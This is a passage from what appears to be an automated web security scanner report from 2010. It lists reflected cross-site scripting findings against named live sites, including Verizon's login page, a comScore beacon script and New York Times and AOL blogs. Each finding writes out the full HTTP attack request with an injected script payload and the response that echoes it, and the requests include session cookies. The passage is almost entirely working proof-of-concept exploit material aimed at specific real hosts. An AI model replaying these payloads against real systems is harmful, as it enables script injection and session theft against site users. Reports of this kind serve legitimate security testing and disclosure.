<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Iraq+War;Afghanistan+War;Baghdad;Kandahar;Kabul;Pakistan;Swat+Valley;U.S.+military;troops;Taliban;Al+Qaeda;Shiite;Sunni+and+Kurd&src=twr2fe07\"><script>alert(1)</script>ef0c8b9436d">
...[SNIP]...

2.189. https://auth.verizon.com/amserver/UI/Login [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8af9a"%3b4024f132588 was submitted in the goto parameter. This input was echoed as 8af9a";4024f132588 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=https%3A%2F%2Fwww22.verizon.com%3A443%2FForYourHome%2FMyAccount%2FProtected%2FServices%2FMyServices.aspx8af9a"%3b4024f132588 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:21 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=EHCLJDFBFEEGFCIFCBIGJOAL; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:21 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129007

<!-- Vignette V6 Fri Nov 19 18:15:20 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
   window.location.href="http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx8af9a";4024f132588";
}

function fnSetSessionCookie(name,value,path,domain){
   document.cookie=name+"="+escape(value)+((path)?";path="+path:"")+((domain)?";domain="+domain:"");
}
var strRemOpt="";
var strMyVzCom=f
...[SNIP]...

2.190. https://auth.verizon.com/amserver/UI/Login [module parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the module request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed15f"><script>alert(1)</script>14aed921693 was submitted in the module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAWed15f"><script>alert(1)</script>14aed921693&clientId=myvzorl&goto= HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vzapps=STATE=TX; JSESSIONID=8D8835B40A91EF6F7C2190E960B846C4; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; amlbcookie=05; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AMAuthCookie=LOGOUT; vzpers=STATE=TX; ProductXML=A; LOB_CATEGORY=; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CustTrackPage=GHP; BusinessUnit=business; V347=CT-2; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: 03A06V
Content-Type: text/html; charset=utf-8
Content-Length: 47392
Expires: Sat, 20 Nov 2010 03:43:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:43:29 GMT
Connection: close
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6a345525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 03:48:29 GMT; path=/foryourhome/registration/; domain=verizon.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&err=1014&realm=dotcom&module=AIAWed15f"><script>alert(1)</script>14aed921693&clientId=myvzorl" name="target">
...[SNIP]...

2.191. https://auth.verizon.com/amserver/UI/Login [realm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the realm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe97"><script>alert(1)</script>572cfcb2141 was submitted in the realm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /amserver/UI/Login?realm=dotcom8fe97"><script>alert(1)</script>572cfcb2141&module=AIAW&clientId=myvzorl&goto= HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vzapps=STATE=TX; JSESSIONID=8D8835B40A91EF6F7C2190E960B846C4; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; amlbcookie=05; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AMAuthCookie=LOGOUT; vzpers=STATE=TX; ProductXML=A; LOB_CATEGORY=; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CustTrackPage=GHP; BusinessUnit=business; V347=CT-2; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA18V
Content-Type: text/html; charset=utf-8
Content-Length: 47392
Expires: Sat, 20 Nov 2010 03:43:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:43:28 GMT
Connection: close
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f345525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 03:48:28 GMT; path=/foryourhome/registration/; domain=verizon.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&err=1007&realm=dotcom8fe97"><script>alert(1)</script>572cfcb2141&module=AIAW&clientId=myvzorl" name="target">
...[SNIP]...

2.192. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 8855f<script>alert(1)</script>1e2dd1e9c1a was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=88855f<script>alert(1)</script>1e2dd1e9c1a&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=3136951&c15= HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 28 Nov 2010 13:47:39 GMT
Date: Sun, 21 Nov 2010 13:47:39 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"88855f<script>alert(1)</script>1e2dd1e9c1a", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"3136951", c15:"", c16:"", r:""});

2.193. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 93a26<script>alert(1)</script>ad78d6dcfac was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=313695193a26<script>alert(1)</script>ad78d6dcfac&c15= HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 28 Nov 2010 13:49:21 GMT
Date: Sun, 21 Nov 2010 13:49:21 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"313695193a26<script>alert(1)</script>ad78d6dcfac", c15:"", c16:"", r:""});

2.194. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload c75f8<script>alert(1)</script>174d4d721f0 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=3136951&c15=c75f8<script>alert(1)</script>174d4d721f0 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 28 Nov 2010 13:49:36 GMT
Date: Sun, 21 Nov 2010 13:49:36 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"3136951", c15:"c75f8<script>alert(1)</script>174d4d721f0", c16:"", r:""});

2.195. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c2aa9<script>alert(1)</script>a4c0a46c225 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404c2aa9<script>alert(1)</script>a4c0a46c225&c3=15&c4=12414&c5=&c6=&c10=3136951&c15= HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 28 Nov 2010 13:47:55 GMT
Date: Sun, 21 Nov 2010 13:47:55 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404c2aa9<script>alert(1)</script>a4c0a46c225", c3:"15", c4:"12414", c5:"", c6:"", c10:"3136951", c15:"", c16:"", r:""});

2.196. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload e1348<script>alert(1)</script>5d738a0db9e was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15e1348<script>alert(1)</script>5d738a0db9e&c4=12414&c5=&c6=&c10=3136951&c15= HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 28 Nov 2010 13:48:13 GMT
Date: Sun, 21 Nov 2010 13:48:13 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15e1348<script>alert(1)</script>5d738a0db9e", c4:"12414", c5:"", c6:"", c10:"3136951", c15:"", c16:"", r:""});

2.197. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 697b7<script>alert(1)</script>01a3fe12bea was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414697b7<script>alert(1)</script>01a3fe12bea&c5=&c6=&c10=3136951&c15= HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 28 Nov 2010 13:48:30 GMT
Date: Sun, 21 Nov 2010 13:48:30 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414697b7<script>alert(1)</script>01a3fe12bea", c5:"", c6:"", c10:"3136951", c15:"", c16:"", r:""});

2.198. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 43ed9<script>alert(1)</script>d62acbf0ddb was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=43ed9<script>alert(1)</script>d62acbf0ddb&c6=&c10=3136951&c15= HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 28 Nov 2010 13:48:47 GMT
Date: Sun, 21 Nov 2010 13:48:47 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"43ed9<script>alert(1)</script>d62acbf0ddb", c6:"", c10:"3136951", c15:"", c16:"", r:""});

2.199. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e1914<script>alert(1)</script>4cae9d0d21b was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=e1914<script>alert(1)</script>4cae9d0d21b&c10=3136951&c15= HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 28 Nov 2010 13:49:05 GMT
Date: Sun, 21 Nov 2010 13:49:05 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"e1914<script>alert(1)</script>4cae9d0d21b", c10:"3136951", c15:"", c16:"", r:""});

2.200. http://bats.blogs.nytimes.com/2010/11/19/yankees-pick-larry-rothschild-as-pitching-coach/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bats.blogs.nytimes.com
Path:   /2010/11/19/yankees-pick-larry-rothschild-as-pitching-coach/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd580"><script>alert(1)</script>2fc05859bb4 was submitted in the src parameter. This input was echoed as fd580\"><script>alert(1)</script>2fc05859bb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/yankees-pick-larry-rothschild-as-pitching-coach/?src=twrfd580"><script>alert(1)</script>2fc05859bb4 HTTP/1.1
Host: bats.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:49:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://bats.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
kees+spring+training+pitchers+catchers+sluggers+home+runs+World+Series+American+League+National+League;baseball;brian-cashman;dave-eiland;gil-patterson;larry-rothschild;mike-harkey;scott-aldred&src=twrfd580\"><script>alert(1)</script>2fc05859bb4">
...[SNIP]...

2.201. http://blog.games.com/2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.games.com
Path:   /2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4cb"><script>alert(1)</script>f55bbf42144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/?3b4cb"><script>alert(1)</script>f55bbf42144=1 HTTP/1.1
Host: blog.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:46:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 28147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphpro
...[SNIP]...
<meta property="og:url" content="http://blog.games.com/2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/?3b4cb"><script>alert(1)</script>f55bbf42144=1" />
...[SNIP]...

2.202. http://body.aol.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://body.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bae9"><script>alert(1)</script>7fff34b5499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

